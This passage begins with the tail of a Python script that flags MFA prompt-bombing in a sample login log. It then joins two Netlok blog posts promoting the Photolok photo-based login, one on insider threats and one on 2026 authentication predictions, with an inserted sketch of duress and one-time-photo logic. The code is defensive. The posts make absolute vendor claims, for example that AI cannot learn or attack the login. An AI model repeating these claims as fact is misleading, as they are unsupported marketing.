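2025-11-03T13:42:05Z bob approved
2025-11-03T15:00:00Z carol denied
2025-11-03T15:30:00Z carol approved
2025-11-03T22:10:00Z dave timeout
2025-11-03T22:10:30Z dave denied
2025-11-03T22:11:00Z dave denied
2025-11-03T22:11:30Z dave timeout
2025-11-03T22:12:00Z dave denied
"""

WINDOW = timedelta(minutes=5)   # assumed look-back window
THRESHOLD = 5                   # assumed number of unapproved prompts that is abnormal


def parse(line):
    """Split one log line into (timestamp, user, result)."""
    ts, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, result


def detect_prompt_bombing(log_text, window=WINDOW, threshold=THRESHOLD):
    """Return (user, alert_kind, timestamp) tuples for a time-ordered log.

    push_flood           -> `threshold` unapproved prompts inside `window`
    approval_after_flood -> an approval arrives while the flood is still in the
                            window; treat the resulting session as suspect
    """
    recent = defaultdict(deque)   # user -> timestamps of unapproved prompts
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, result = parse(line)
        q = recent[user]
        # Drop prompts that have aged out of the sliding window.
        while q and ts - q[0] > window:
            q.popleft()
        if result in ("denied", "timeout"):
            q.append(ts)
            if len(q) == threshold:          # fire once as the burst crosses the line
                alerts.append((user, "push_flood", ts))
        elif result == "approved":
            if len(q) >= threshold:          # the user gave in during the burst
                alerts.append((user, "approval_after_flood", ts))
            q.clear()                        # a successful login ends the burst
    return alerts


if __name__ == "__main__":
    for user, kind, ts in detect_prompt_bombing(SAMPLE_LOG):
        print(f"{ts.isoformat()} {user} {kind}")
```

An `approval_after_flood` alert is the one to act on first: the session that approval created should be revoked and the account's primary credential treated as already known to the attacker.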

A Different Approach: Authentication Designed for the AI Era

Addressing insider threats requires authentication that operates on fundamentally different principles. These systems must be designed from the ground up to resist both human manipulation and AI-powered attacks.

Photolok, developed by Netlok, represents this new paradigm in enterprise authentication. Rather than relying on static secrets that can be stolen or replicated, Photolok replaces passwords with user-selected photos that contain embedded encrypted codes using steganography. And unlike biometrics or static passwords, users can easily update their photos at any time, making credential reset simple and immediate. This approach addresses the core vulnerabilities that make traditional authentication susceptible to insider compromise.

The system’s UltraSafe AI/ML login protection is particularly relevant in today’s threat environment. Photolok leverages the “Picture-Superiority Effect,” the scientifically proven principle that humans remember images far better than text, and randomizes photos and embedded codes every session [9]. Because login selections are based on unique, personally meaningful photos rather than static data or predictable biometric patterns, AI and machine learning tools cannot identify or learn patterns to exploit. Even with large datasets, attackers cannot brute-force or simulate a user’s photo selection.

For organizations concerned about coerced access, a scenario where an insider is forced to authenticate under duress, Photolok offers a unique Duress Photo feature that functions as a visual silent alarm. When an account owner feels endangered or forced to provide access, they can select their designated duress photo. The system grants access normally while simultaneously alerting security administrators that the account may be compromised and the user may need assistance [10].

The 1-Time Use Photo capability addresses another common insider attack vector: shoulder surfing and observation attacks. In public or office environments where screens may be visible, users can designate photos for single-use authentication, defeating replay attacks and making credential theft through observation ineffective.

Building Resilience Against Insider Threats

Effective insider threat management requires more than technology; it demands a comprehensive approach that combines preventive controls with detective capabilities. The Ponemon Institute research found that organizations with formal insider risk management programs reduced containment time significantly, with 65% reporting their program was the only security strategy that enabled them to pre-empt breaches by detecting insider risk early [1].

Key elements of a resilient insider threat program include:

Authentication that resists credential theft by eliminating static secrets attackers can steal, guess, or crack. Solutions like Photolok that use unique photo selection rather than memorized strings fundamentally change the economics of credential attacks.

Behavioral analytics that correlate cyber, physical, and organizational signals to identify potential threats before they escalate. The 2025 research shows that only 12% of organizations have mature predictive risk assessment models [3], a capability gap that creates significant exposure.

Zero trust principles that verify identity continuously rather than granting persistent access based on a single authentication event. When combined with strong initial authentication, this approach limits the damage any single compromised credential can cause.

The Cost of Inaction

The financial case for addressing insider threats is unambiguous. Organizations that detect insider risk early report significant benefits: reduced containment costs, preserved data integrity, and protected reputational capital. The contrast with delayed detection is stark: incidents taking over 91 days to contain cost an average of $18.7 million, compared to $10.6 million for those resolved within 31 days [1].

Beyond direct costs, insider incidents create cascading effects that damage customer relationships, trigger regulatory scrutiny, and undermine competitive positioning. In an era where digital trust is a strategic asset, organizations cannot afford authentication systems that remain vulnerable to their most predictable attack vector.

Taking Action

The insider threat landscape will continue to intensify as AI capabilities advance and hybrid work models expand the attack surface. Organizations that wait for a breach to force action will pay the highest price in dollars, disruption, customer relations, and stakeholder trust.

Forward-looking security leaders are moving now to implement authentication solutions designed for the realities of AI-era threats. By replacing vulnerable password-based systems with UltraSafe authentication like Photolok, enterprises can close the authentication gap that insiders exploit while providing their workforce with a simpler, more intuitive login experience.

The question isn’t whether your organization will face insider threats. It’s whether your authentication infrastructure will stop them.

About the Author

Kasey Cromer is Director of Customer Experience at Netlok.

Sources

[1] Ponemon Institute. “2025 Cost of Insider Risks Global Report.” February 2025. https://ponemon.dtexsystems.com/

[2] Cybersecurity Insiders. “2024 Insider Threat Report.” 2024. https://www.cybersecurity-insiders.com/

[3] Cybersecurity Insiders and Cogility. “2025 Insider Risk Report.” November 2025. https://www.cybersecurity-insiders.com/2025-insider-risk-report-the-shift-to-predictive-whole-person-insider-risk-management/

[4] Verizon. “2025 Data Breach Investigations Report.” May 2025. https://www.verizon.com/business/resources/reports/dbir/

[5] TechCrunch. “CrowdStrike fires ‘suspicious insider’ who passed information to hackers.” November 21, 2025. https://techcrunch.com/2025/11/21/crowdstrike-fires-suspicious-insider-who-passed-information-to-hackers/

[6] SecurityWeek. “CrowdStrike Insider Helped Hackers Falsely Claim System Breach.” November 24, 2025. https://www.securityweek.com/crowdstrike-insider-helped-hackers-falsely-claim-system-breach/

[7] World Economic Forum and Accenture. “Global Cybersecurity Outlook 2025.” January 2025. https://www.weforum.org/publications/global-cybersecurity-outlook-2025/

[8] Syteca. “Insider Threat Statistics for 2025: Facts, Reports & Costs.” October 2025. https://www.syteca.com/en/blog/insider-threat-statistics-facts-and-figures

[9] Netlok. “Company Overview.” 2025. https://netlok.com/company-overview/

[10] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/

Kasey Cromer, Netlok | December 4, 2025

Series Recap

Part 1 (November 14, 2025) took a deeper dive into the deepfake epidemic itself—the $25 million video call scams, the 1,000%+ increase in attacks since 2023, and why human detection capabilities are failing at a 75% rate. We examined why detection alone cannot win this arms race and outlined an enterprise defense framework.

In Part 2 (November 21, 2025) of this series, we examined the staggering scope of AI-powered fraud—a $40 billion crisis by 2027 that is overwhelming enterprise security teams. We explored how generative AI has transformed the fraud landscape, with 93% of financial institutions expressing serious concern about AI-driven fraud acceleration and deepfake incidents surging by 700%.

Now, in this concluding installment, we look ahead to how these same dynamics will reshape authentication between 2026 and 2028—and what security leaders can do today to get ahead of that curve. The threats documented in Parts 1 and 2 are not static; they are accelerating. As we approach 2026, enterprises face a critical turning point where the convergence of advancing AI capabilities and expanding data exposure creates unprecedented authentication challenges. The question is no longer whether to evolve your security posture, but how quickly you can implement defenses designed for the threats of tomorrow. You can’t afford to wait.

Executive Summary

The authentication landscape stands at an inflection point. Forrester predicts that an agentic AI deployment will cause a publicly disclosed breach in 2026, while Gartner warns that by 2027 AI agents will reduce the time to exploit account exposures by 50%. As deepfake technology becomes increasingly accessible and massive data exposures amplify attacker capabilities, traditional authentication methods face obsolescence. This article examines the converging threats shaping 2026 and beyond, and demonstrates why Netlok’s Photolok, with its patented steganography, AI/ML defense, and unique user security features like Duress Photo and 1-Time Use Photo, represents the authentication paradigm shift enterprises require.

The 2026 Threat Horizon: What Industry Leaders Are Predicting

The next 12 to 24 months will reshape enterprise cybersecurity in fundamental ways, leading research firms to issue stark warnings about what lies ahead.

Forrester’s Predictions 2026: Cybersecurity and Risk report forecasts that an agentic AI deployment will cause a publicly disclosed data breach next year, leading to employee dismissals. As organizations rush to build agentic AI workflows, the lack of proper guardrails means autonomous AI agents may sacrifice accuracy for speed—creating systemic vulnerabilities that cascade across enterprises [1].

Gartner’s analysis is equally sobering. By 2027, AI agents will accelerate the time it takes threat actors to hijack exposed accounts by 50%. The firm also predicts that 40% of social engineering attacks will target executives as well as the broader workforce by 2028, with attackers combining social engineering tactics with deepfake audio and video to deceive employees during calls [2]. Perhaps most alarming: by 2028, 25% of enterprise breaches will be traced back to AI agent abuse from both external and malicious internal actors [3].

The World Economic Forum reinforces these concerns, noting that deepfake fraud cases surged 1,740% in North America between 2022 and 2023, with financial losses exceeding $200 million in Q1 2025 alone [4]. Voice cloning now requires just 20-30 seconds of audio, while convincing video deepfakes can be created in 45 minutes using freely available software.

Key 2026-2028 Predictions at a Glance

Prediction | Source
Agentic AI will cause a public breach in 2026 | Forrester [1]
AI agents will reduce account exploit time by 50% by 2027 | Gartner [2]
30% of enterprises will consider standalone IDV unreliable by 2026 | Gartner [5]
25% of enterprise breaches traced to AI agent abuse by 2028 | Gartner [3]
Deepfake fraud projected to surge 162% in 2025 | Pindrop [6]

The Data Exposure Multiplier: When Attackers Have More to Work With

The AI fraud threat does not exist in isolation. Its potency is directly amplified by the availability of personal data. When attackers possess comprehensive personal information—names, dates of birth, addresses, Social Security numbers, family relationships—AI-powered fraud becomes exponentially more dangerous and convincing.

Recent events have underscored how data handling practices can dramatically increase this risk. In August 2025, a whistleblower complaint revealed that personal information belonging to more than 300 million Americans had been copied to a cloud environment with reduced security controls. According to reporting from NPR and other outlets, career cybersecurity officials described the situation as “very high risk,” with one internal assessment warning of a potential “catastrophic impact” and noting the possibility of having to reissue Social Security numbers to millions of Americans in the event of a breach [7][8]. The Social Security Administration has stated that it is not aware of any compromise and that data is stored in secure environments with robust safeguards—but the episode underscores how concentrated datasets can amplify identity theft risk if controls fail.

This scenario illustrates a broader concern: as massive datasets containing sensitive personal information become more accessible—whether through breaches, mishandling, or inadequate security—AI-powered attackers gain richer raw material for their schemes. Cybersecurity experts have warned that if bad actors gained access to comprehensive personal information, they could create holistic profiles that enable highly convincing impersonation attacks [9]. The combination of detailed personal data and sophisticated deepfake technology creates what researchers have characterized as a “perfect storm” for identity fraud.

For enterprises, this means authentication systems must assume attackers may already possess significant knowledge about their targets. Traditional knowledge-based authentication—security questions, personal details, even voice recognition—becomes increasingly unreliable when attackers can synthesize convincing responses using AI trained on exposed data.

Why Traditional Authentication Won’t Survive 2026

The fundamental challenge facing enterprises is that authentication methods designed for a pre-AI world are now being systematically dismantled by AI-powered attacks.

Gartner has predicted that by 2026, attacks using AI-generated deepfakes on face biometrics will mean that 30% of enterprises will no longer consider identity verification and authentication solutions reliable in isolation [5]. This represents a seismic shift in enterprise security posture—nearly one-third of organizations abandoning confidence in their existing authentication stack, with direct implications for regulatory exposure, cyber insurance, and board risk oversight.

According to Entrust’s 2026 Identity Fraud Report, deepfakes now account for one in five biometric fraud attempts, with deepfaked selfies increasing by 58% in 2025 and injection attacks surging 40% year-over-year [10]. The report notes that coercion attacks are particularly difficult to detect because victims use their own genuine documents and biometrics—only under pressure or instruction from someone else. The report’s conclusion is blunt: “We’ve crossed a threshold where humans simply can’t rely on their senses anymore.”

The passwordless movement, while representing progress, does not fully address these challenges. A recent CNBC report notes that 92% of CISOs have implemented or are planning passwordless authentication—up from 70% in 2024 [11]. However, many passwordless solutions rely on biometrics that are increasingly vulnerable to deepfake attacks, or on device-based authentication that can be compromised through social engineering.

What enterprises need is not simply “passwordless” authentication, but authentication that is fundamentally resistant to AI-powered attacks—systems where there is no pattern for AI to learn, no biometric to fake, and no knowledge to extract.

The Path Forward: Authentication Built for the AI Era

Photolok represents a fundamentally different approach to authentication—one designed from the ground up to resist the AI-powered threats that are rendering traditional methods obsolete.

At its core, Photolok is a passwordless authentication solution using patented steganographic photos. Rather than relying on passwords, biometrics, or knowledge-based verification, users authenticate by selecting their coded photos during login. This approach delivers what Netlok describes as “UltraSafe AI/ML login protection” when compared to passwords, passkeys, and biometrics.

AI/ML Defense: Preventing Pattern Recognition

Photolok’s AI/ML Defense capability prevents artificial intelligence and machine learning attacks through a simple but powerful principle: randomization. All account photos are randomly placed in photo panels during each login. Because there is no consistent pattern—no predictable sequence or positioning—bots cannot identify which photographs to attack. This randomized, non-predictable login experience deprives agentic AI of the consistent patterns and replayable signals it needs to optimize attacks over time. This fundamentally differs from biometrics (which present a consistent target), passwords (which can be captured or guessed), and behavioral patterns (which can be learned and mimicked).

Duress Photo: The Visual Silent Alarm

In an era of sophisticated social engineering and physical coercion attacks, Photolok offers a capability no other authentication system provides: the Duress Photo.

Photolok is the only login method that uses a “visual silent alarm.” When an account owner feels they are in danger or are being forced to provide access to a bad actor, they can activate the Duress Security Alert by selecting their designated Duress photo in the first photo panel. When clicked, an email and text notification are sent immediately to IT security and other designated personnel, all while allowing the user to continue to log in to their destination without any disruption that might alert the attacker.

This capability addresses a critical gap in enterprise security. As Entrust notes, coercion attacks are particularly hard to detect because victims use their own documents and biometrics under pressure; a Duress Photo gives those victims a safe, covert signal path that traditional biometrics simply do not offer. For example, if a finance leader is pressured into disclosing confidential information on a video call by a convincing deepfake impersonation, they can silently trigger Duress while “complying” with the request—enabling immediate response from security teams while preventing the authorization of fraudulent transactions.

1-Time Use Photo: Defeating Observation Attacks

Photolok is also the only login method that gives users the option of using a temporary photo to prevent shoulder surfing in office or public settings. The 1-Time Use Photo provides enhanced remote security by automatically removing itself from the user’s account after a single use.

If someone is using a camera, screen capture malware, or simply looking over a user’s shoulder, the 1-Time Photo protects the account because it becomes invalid immediately after use. If someone records or screenshares a login session, that 1-Time Use Photo is useless on the next attempt. This feature is particularly valuable for remote workers, traveling executives, and any scenario where login activity might be observed—addressing vulnerabilities that traditional authentication methods cannot mitigate.
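The Duress Photo and 1-Time Use Photo behaviours described in this article reduce to two server-side rules: a duress selection must produce the same visible outcome as a normal login while raising an alert out of band, and a one-time credential must be consumed on first use so a replay fails. The sketch below is an added example that models only those rules; it is not Netlok's code and does not reflect how Photolok is implemented. The class, photo identifiers, single-panel layout and alert callback are all hypothetical.

```python
import secrets


class PhotoLoginModel:
    """Hypothetical model: photos are opaque ids, not real steganographic images."""

    def __init__(self, alert_sink):
        self._accounts = {}
        self._alert = alert_sink   # callable(user, reason); stands in for email/SMS

    def enroll(self, user, normal, one_time=(), duress=None):
        self._accounts[user] = {
            "normal": set(normal),       # reusable photos
            "one_time": set(one_time),   # valid for exactly one login
            "duress": duress,            # grants access and alerts silently
        }

    def build_panel(self, user, decoys, size=9):
        """Mix the user's photos with decoys in a fresh random order per login."""
        acct = self._accounts[user]
        own = sorted(acct["normal"] | acct["one_time"])
        if acct["duress"] is not None:
            own.append(acct["duress"])
        panel = own + list(decoys)[: max(0, size - len(own))]
        secrets.SystemRandom().shuffle(panel)   # no stable position to learn
        return panel

    def verify(self, user, selected):
        """Return the response the client sees; alerts travel out of band."""
        acct = self._accounts.get(user)
        if acct is None:
            return {"granted": False}
        if acct["duress"] is not None and selected == acct["duress"]:
            # Same response as a normal login, so an observer learns nothing.
            self._alert(user, "duress")
            return {"granted": True}
        if selected in acct["one_time"]:
            # Consume before answering: a recorded selection cannot be replayed.
            acct["one_time"].discard(selected)
            return {"granted": True}
        return {"granted": selected in acct["normal"]}


def demo():
    """Run the three cases on constructed data and return what happened."""
    alerts = []
    model = PhotoLoginModel(lambda user, reason: alerts.append((user, reason)))
    model.enroll("alice", normal={"p-lake"}, one_time={"p-train"}, duress="p-dog")
    first = model.verify("alice", "p-train")    # one-time photo, first use
    replay = model.verify("alice", "p-train")   # same photo, observed and replayed
    duress = model.verify("alice", "p-dog")     # coerced login
    return first, replay, duress, alerts


if __name__ == "__main__":
    print(demo())
```

The property to preserve in any design like this is that the duress response is indistinguishable from a normal one at the client; any difference in timing, redirect or session scope gives the coercer a signal.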

Additional Security Layers

Beyond these distinctive capabilities, Photolok incorporates additional security measures, including integration with existing authenticators for access codes, device authorization controls, and patented steganography that embeds encrypted codes within photos—making them highly resistant to external observation and AI analysis. The system also simplifies adoption across diverse user groups, eliminating language and literacy barriers that can limit the effectiveness of text-based authentication.

Bringing This 3-Part Series Together

The Window Is Closing

The World Economic Forum has stated plainly that traditional verification methods are “no longer sufficient” against AI-enabled fraudsters [12]. That aligns with the conclusion from Part 1 of this series: detection alone cannot close the gap against adaptive, AI-enabled adversaries; the underlying authentication factor must change. Global cybercrime now represents a $10.5 trillion industry—larger than the GDP of every country except the United States and China. Deloitte projects AI-enabled fraud losses in the U.S. will reach $40 billion by 2027.

The research is clear: enterprises that delay authentication modernization face mounting risk—in incident costs, regulatory exposure, and erosion of customer trust. As this three-part series has documented, the AI fraud threat is not theoretical—it is present, accelerating, and systematically defeating legacy security measures.

The choice facing enterprise leaders is straightforward: evolve authentication now, implement systems designed for AI-era threats, or become another statistic in the growing tally of successful AI-powered attacks. Photolok’s patented steganography technology, combined with unique security features like Duress Photo and 1-Time Use Photo, offers a proven path forward—authentication that protects against the threats of 2026 and beyond.

Take Action Against AI Fraud

Don’t wait for AI-powered fraudsters to target your organization. Discover how Photolok’s patented steganography and AI-resistant authentication can protect your enterprise while improving user experience.

Author: Kasey Cromer is Director of Customer Experience at Netlok.

Sources

[1] Predictions 2026: Cybersecurity and Risk — Forrester (October 2025)

[2] Gartner Predicts AI Agents Will Reduce The Time It Takes To Exploit Account Exposures by 50% by 2027 — Gartner (March 2025)

[3] Gartner Unveils Top Predictions for IT Organizations and Users in 2025 and Beyond — Gartner (October 2024)

[4] Detecting dangerous AI is essential in the deepfake era — World Economic Forum (July 2025)

[5] Gartner Predicts 30% of Enterprises Will Consider Identity Verification and Authentication Solutions Unreliable in Isolation Due to AI-Generated Deepfakes by 2026 — Gartner (February 2024)

[6] Deepfake Fraud Could Surge 162% in 2025 — Pindrop (July 2025)

[7] Whistleblower says DOGE put Social Security numbers at risk — NPR (August 2025)

[8] SSA whistleblower warns of major security risk following DOGE data access — Federal News Network (August 2025)

[9] Whistleblower: DOGE Put Millions of Americans’ Data at Risk — TIME (August 2025)

[10] Protect every layer of identity to thwart deepfake injection attacks — Entrust 2026 Identity Fraud Report (November 2025)

[11] More companies are shifting workers to passwordless authentication — CNBC (November 2025)

[12] AI-driven cybercrime is growing, here’s how to stop it — World Economic Forum (January 2025)

[13] Deepfake Statistics & Trends 2025 — Keepnet Labs (November 2025)

[14] AI-powered fraud is exploding — Cybernews/Entrust (November 2025)

[15] Forrester: Agentic AI-Powered Breach Will Happen in 2026 — Infosecurity Magazine (October 2025)